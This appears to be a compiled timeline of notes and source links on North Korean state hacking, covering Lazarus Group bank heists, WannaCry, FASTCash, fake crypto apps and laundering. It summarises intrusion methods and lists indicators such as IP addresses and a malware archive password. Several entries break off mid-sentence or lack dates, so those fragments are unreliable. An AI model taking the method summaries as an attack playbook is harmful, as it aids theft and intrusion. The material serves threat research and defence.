- Reported to be manufactured in North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar notes, also known as a Superdollar. The notes are produced using processes and materials similar to those of genuine US currency.
- First detected in 1989; over $50M had been found as of 2006.
- https://www.govinfo.gov/content/pkg/CHRG-109shrg28241/pdf/CHRG-109shrg28241.pdf
- A large-scale DDoS attack on US and South Korean websites used the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).
- Cyber-espionage campaign that utilized unsophisticated DDoS to target the South Korean government
- http://news.bbc.co.uk/2/hi/asia-pacific/8142282.stm
- https://www.theguardian.com/world/2009/jul/11/south-korea-blames-north-korea-cyber-attacks
- “Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure organizations. Compromised computers within South Korea are used to launch DDoS attacks.
- DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutions, and an ISP
- At the time, two other groups, using the personas “NewRomanic Cyber Army Team” and “WhoIs Team”, took credit for that attack
- Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
- Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
- Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
- The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
- Perpetrators identified themselves as the Guardians of Peace.
- Large amounts of data were stolen and slowly leaked in the days following the attack.
- U.S. investigators say the culprits spent at least two months copying critical files
- The attack was conducted using malware, including a Server Message Block (SMB) worm tool used to conduct attacks
- Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
- The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
- November 24, 2014 - previously installed malware rendered many Sony employees' computers inoperable, displaying a warning from a group calling themselves the Guardians of Peace along with a portion of the confidential data taken during the hack.
- Several Sony-related Twitter accounts were also taken over
- Park was a North Korean hacker who worked for the country's Reconnaissance General Bureau, the equivalent of the
- The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
- https://en.wikipedia.org/wiki/Sony_Pictures_hack
- https://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation
- Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
- AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
- The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
- The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
- https://www.virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/
- Banco del Austro (BDA) in Ecuador instructed San Francisco-based Wells Fargo to transfer money to bank accounts in Hong Kong.
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/ecuadorean-bank-loses-12m-via-swift
- https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD
- By March the hackers had a backdoor into the bank's electronic communication system, allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols and did not alert security to their presence.
- Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.
2015: Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK
- Joint, two-year-long effort between Kaspersky Lab, AlienVault, Symantec, Invincea, ThreatConnect, Volexity, and PunchCyber
- https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database.
- https://en.wikipedia.org/wiki/Bangladesh_Bank_robbery
- https://securelist.com/lazarus-under-the-hood/77908/
- https://www.reuters.com/investigates/special-report/cyber-heist-federal/
- https://www.reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV/
2015-2018: Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.
2016-05-14: FASTCash - $16M was withdrawn from roughly 1700 7-Eleven ATMs across Japan using data stolen from South Africa’s Standard Bank
- Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist
- https://www.reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN
2016-05-26: SWIFT Heists - Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8ae1ff71-e440-4b79-9943-199d0adb43fc&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
- Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
- Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
- The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a “wider and highly adaptive campaign” is underway targeting banks.
- A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
- Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks was; however, code sharing between Trojan.Banswift (used in the Bangladesh attack to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.
- https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks
2016-2020: Multiple spear-phishing campaigns targeting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S. Department of State, and the U.S. Department of Defense
- which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”
- Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
- All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
- We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
- Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
- Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
- Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
- https://securelist.com/lazarus-under-the-hood/77908/
- https://www.csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html
- This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
- https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html
- Creation of the destructive WannaCry 2.0 ransomware in May 2017
- The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware.
- https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
- https://arstechnica.com/tech-policy/2017/12/trump-administration-formally-blames-north-korea-for-wannacry-now-what/
- https://arstechnica.com/information-technology/2017/05/theres-new-evidence-tying-wcry-ransomware-worm-to-prolific-hacking-group/
- https://arstechnica.com/gadgets/2017/08/wannacry-operator-empties-bitcoin-wallets-connected-to-ransomware/
- https://arstechnica.com/gadgets/2017/08/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/
- https://www.group-ib.com/blog/lazarus/
- 210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
- 175.45.178.222 - National Defence Commission
- 175.45.178.19 - Ghost RAT
- 175.45.178.97 - Ghost RAT
2017-04-22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures reportedly employed during this compromise were different from those we have observed in subsequent intrusion attempts, and as of yet there are no clear indications of North Korean involvement.)
2017-04-26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
2017-06-01 – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
2017-06-13: CISA's report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
- This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
2017-06-13: US-CERT's HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
2017-08-14: Unit42 has discovered an ongoing attack targeting individuals involved with US defense contracts that links back to the perpetrators of the Sony Pictures Hack.
- Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors.
- https://unit42.paloaltonetworks.com/unit42-blockbuster-saga-continues/
- https://unit42.paloaltonetworks.com/unit42-the-blockbuster-sequel/
- STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant used to manage North Korea’s distributed denial-of-service (DDoS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
- CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
- CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
- These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
- STIX file for MAR 10135536
- DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
- Two files are 32-bit Windows executables that function as proxy servers and implement a Fake TLS method.
- The third file is an Executable and Linkable Format (ELF) file designed to run on Android platforms as a fully functioning Remote Access Trojan.
- AR 10135536-F: North Korean Trojan: HARDRAIN
- STIX file for MAR 10135536-F
- DHS and FBI identified a Trojan malware variant—referred to as HARDRAIN—used by the North Korean government.
- MAR 10135536.11: North Korean Trojan: SHARPKNOT
- STIX file for MAR 10135536.11
- DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.
- https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
- Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
- Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers, who relied on Novetta et al.’s white papers, with hundreds of pages describing the tools used in the attacks (the Polish and Mexican banks, the WannaCryptor outbreak, phishing campaigns against US defense contractors, etc.), which provide grounds for the attribution of these attacks to the Lazarus Group.
- Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
- One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
- This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
- Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.
2018-04-25: SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.
2018-05-29: CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
- CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
- MAR 10135536-3: HIDDEN COBRA RAT/Worm
- This Joint Technical Alert and MAR authored by DHS and FBI provide information, including IOCs, associated with two families of malware used by the North Korean government: a remote access tool, commonly known as Joanap, and a Server Message Block worm, commonly known as Brambul.
- Analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them.
- https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/
- AR 10135536-12
- DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.
- AR 10135536-17
- DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.
- Nathan P. Shields, FBI, Los Angeles Field Office
- Park worked for the front company Chosun Expo Joint Venture, aka “Korea Expo Joint Venture”, aka “Chosun Expo”
- https://documentcloud.org/documents/4834226-2018-09-06-PARK-COMPLAINT-UNSEALED.html
- https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and
- Author: FireEye
- https://fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html
2018-10-02: CISA's analysis of HIDDEN COBRA FASTCash Campaign
- MAR 10201537: HIDDEN COBRA FASTCash-Related Malware
- CISA, Treasury, FBI, and U.S. Cyber Command identified malware and other IOCs used by the North Korean government in an ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.” The Joint Technical Alert provides information on FASTCash and the MAR provides information on 10 malware samples related to this activity.
- https://www.cisa.gov/news-events/alerts/2018/10/02/hidden-cobra-fastcash-campaign
2018-10-25 - Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite
- Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.
- https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/
2017-2018: According to the Treasury, NK-affiliated hackers “likely” stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.
- 2018-09: Indonesian Crypto Company Theft - $24.9M
- 2018-06: Bithumb2 CEX Hack - Lazarus - $30M
- 2017-12: YouBit CEX Hack (previously known as Yapizon)
- 2017-04: Yapizon CEX Hack - 3831 BTC
2018-2020: Multiple malicious cryptocurrency applications which would provide the North Korean hackers a backdoor into the victims’ computers.
- From March 2018 through at least September 2020: Celas Trade Pro, WorldBit-Bot, iCryptoFx, Union Crypto Trader, Kupay Wallet, CoinGo Trade, Dorusio, CryptoNeuro Trader and Ants2Whale, which would provide the North Korean hackers a backdoor into the victims’ computers.
2018: Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses
- New ability to target macOS.
- Victims were infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited; the application itself showed no signs of malicious behaviour and looked genuine. The malware was delivered via the application's update files. Users installed the program via a download link delivered over email.
- For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
- https://securelist.com/operation-applejeus/87553/
2019-01-30: 200 North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea
- MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
- MAR 10135536-10: North Korean Trojan: BADCALL Note: this version of the BADCALL MAR updates the February 6, 2018 version, and STIX file.
- CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
- ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
- BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.
- https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/
- Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
- In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with ATMDtrack but were not aimed at ATMs. Instead, their list of functions defined them as spy tools, now known as Dtrack.
- Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistent threat actor responsible for multiple cyberespionage and cyber sabotage operations.
2019-11-04: Indian Nuclear Power Plant Attack - We have long known and continuously monitored that North Korea is attacking India
- https://twitter.com/issuemakerslab/status/1191519079514796032
- This is an image of the history of malware used by the North Korean hacker group B that hacked the Kudankulam Nuclear Power Plant (KKNPP) in India. A 16-digit string dkwero38oerA^t@# is the password that the malware uses to compress a list of files on an infected PC.
- https://twitter.com/issuemakerslab/status/1190846548415959040
2020-02-14: CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT
- Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
- The BISTROMATH MAR looks at multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
- SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
- The CROWDEDFLOUNDER MAR looks at a Themida-packed Windows executable.
- HOTCROISSANT is a full-featured beaconing implant.
- ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
- BUFFETLINE is a full-featured beaconing implant.
- The HOPLIGHT MAR looks at multiple malicious executable files, some of which are proxy applications that mask traffic between the malware and the remote operators.
- Two of the usernames adopted were “snowsjohn” and “khaleesi”. Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange.
- https://www.wired.co.uk/article/north-korea-cryptocurrency-hacking-china
- https://www.mandiant.com/resources/unc2891-overview
- UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
- Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, which we have named CAKETAP.
- Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.
- The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.
- MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
- MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
- MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
- CISA, FBI, and DoD identified three malware variants used by the North Korean government.
- COPPERHEDGE belongs to the Manuscrypt family of malware, which is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
- TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.
- CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.
2020-05-28: US charges 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons
- Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions.
- https://int.nyt.com/data/documenthelper/6971-north-korea-indictment/422a99ddac0c39459226/optimized/full.pdf#page=1
- https://www.europeansanctions.com/2020/05/us-charges-33-with-violating-n-korea-wmd-sanctions/
- https://www.nknews.org/2020/05/doj-accuses-north-koreans-of-multi-year-2-5-billion-money-laundering-scheme/
- https://edition.cnn.com/2020/05/28/politics/north-korean-bankers-charges-money-laundering/index.html
- Initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
- According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
- The complaint lists one source of the laundered funds as a DPRK entity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian petroleum products and nuclear and missile components for the DPRK and to aid multiple covert branches of the DPRK’s Foreign Trade Bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
- https://www.justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds
- From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
- It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments was customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters”, thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
- Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
- The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
- https://www.justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean
- https://www.nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system
- Widespread North Korean Espionage Campaign
- It succeeded in infecting several dozen companies and organizations in Israel and globally
- Main targets: defense, governmental companies, and specific employees of those companies
- We assess this to be this year’s main offensive campaign by the Lazarus group
- The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
- Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
- The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
- https://www.clearskysec.com/operation-dream-job/
- https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf
- CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.
2020-08-25: DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign
- MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
- MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
- MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
- CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-239a
- These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders.
- https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020/
- https://justice.gov/usao-dc/pr/united-states-files-complaint-forfeit-280-cryptocurrency-accounts-tied-hacks-two
2020-09-02: Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses
- It includes malware indicators, techniques and tactics
- https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf
2020-09-20: US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.
- An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
- After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
- In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
- At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
- The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
- In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.
- CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.
- Stayed in their systems for months on end
- Contacted in Feb 2020
- Payload delivered in Q2/Q3
- Data exfiltration Q2 Q3 Q4 2020
- By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
- https://www.hvs-consulting.de/public/ThreatReport-Lazarus.pdf
- https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf
- North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
- These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
- Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
- While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
- From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
- Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
- In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
- The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
- More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
